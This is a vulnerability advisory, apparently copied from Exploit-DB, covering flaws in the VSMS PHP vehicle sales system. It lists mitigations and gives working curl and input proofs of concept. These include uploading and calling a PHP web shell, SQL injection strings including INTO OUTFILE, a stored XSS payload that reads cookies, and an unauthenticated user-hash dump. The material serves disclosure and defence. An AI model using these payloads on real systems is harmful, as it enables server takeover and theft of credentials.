VSMS Multiple Vulnerabilities

vendor:

by:

Sing

9.8

CVSS

CRITICAL

Multiple

CWE

Product Name:

Affected Version From: 07/2017 (possible v1.2)

Affected Version To:

Patch Exists: No

Related CWE: CVE-2017-1000474

CPE:

Metasploit:

Other Scripts:

Platforms Tested: CentOS 6.9

2018

VSMS Multiple Vulnerabilities

1. Lack of file type filter enabling attacker to upload PHP scripts that can later be executed2. Found SQLI in the Date of Birth text box3. Found Stored XSS in manufacturer_name4. Multiple vulnerabilities (SQLI and Information Leak)

Mitigation:

1. Implement file type filtering on file uploads2. Implement proper input validation and parameterization to prevent SQL injection3. Implement proper input sanitization and output encoding to prevent XSS4. Implement proper input validation and access control to prevent SQL injection and information leakage

Source

Exploit-DB raw data:

# Exploit Title: VSMS Multiple Vulnerabilities
# Google Dork: N/A
# Date: 16-3-2018
# Exploit Author: Sing
# Vendor Homepage: https://sourceforge.net/projects/vsms-php/?source=typ_redirect
# Software Link: https://sourceforge.net/projects/vsms-php/?source=typ_redirect
# Version: 07/2017 (possible v1.2)
# Tested on: CentOS 6.9
# CVE : CVE-2017-1000474



1 login/vehicles.php: Lack of file type filter enabling attacker to upload PHP scripts that can later be executed


POC

curl -i -b 'PHPSESSID=58csdp0as3lvqapqjesp67tr05' -F 'submit=submit' -F support_images[]=@./getShell.php http://10.0.0.14/soyket-vsms-php-63b563b/login/vehicles.php

The malicious PHP file has been uploaded to /var/www/html/soyket-vsms-php-63b563b/login/uploads.  Now, browse to the location and note the file name.  In my vase it's 1510529218getShell.php.  To execute it do

curl http://10.0.0.14/soyket-vsms-php-63b563b/login/uploads/1510529218getShell.php?cmd=id



2 login/profile.php: Found SQLI in the Date of Birth text box.


POC

Paste the below POC into the birth date text box and update.  A mysql version will appear in the Position box

2015-11-30',u_position=@@version,u_type='Employee' WHERE u_email='employee@employee.com';-- -



3 login/Actions.php: Found Stored XSS in manufacturer_name


POC

curl http://10.0.0.14/soyket-vsms-php-63b563b/login/Actions.php?action=create -d 'manufacturer_name=<script>alert(document.cookie)</script>'

Now when user's browse to login/model.php page, he/she will see an alert with the session cookie

http://10.0.0.14/soyket-vsms-php-63b563b/login/model.php



4 login/Actions.php (Multiple vulnerabilities)


POC (SQLI)

curl http://10.0.0.14/soyket-vsms-php-63b563b/login/Actions.php?action=checkuser -d "username=employee@employee.com' union select 'SQLIIII' into outfile'/tmp/stuff.txt"

This SQLI will write SQLIIII to /tmp/stuff.txt.




POC (Information Leak

curl http://10.0.0.14/soyket-vsms-php-63b563b/login/Actions.php?action=listu

This gives anonymous user full list of the users table with unsalted MD5 hash passwords.



5. Solution:



The author notified of a new version with fixes (possibly v1.3).  It can be found at vendor’s home page

https://sourceforge.net/projects/vsms-php/?source=typ_redirect


Time Line

Author was notified of the vulnerabilities on 27-01-2018
Author notified of the new updates on 14-03-2018
Exploit released on 16-03-2018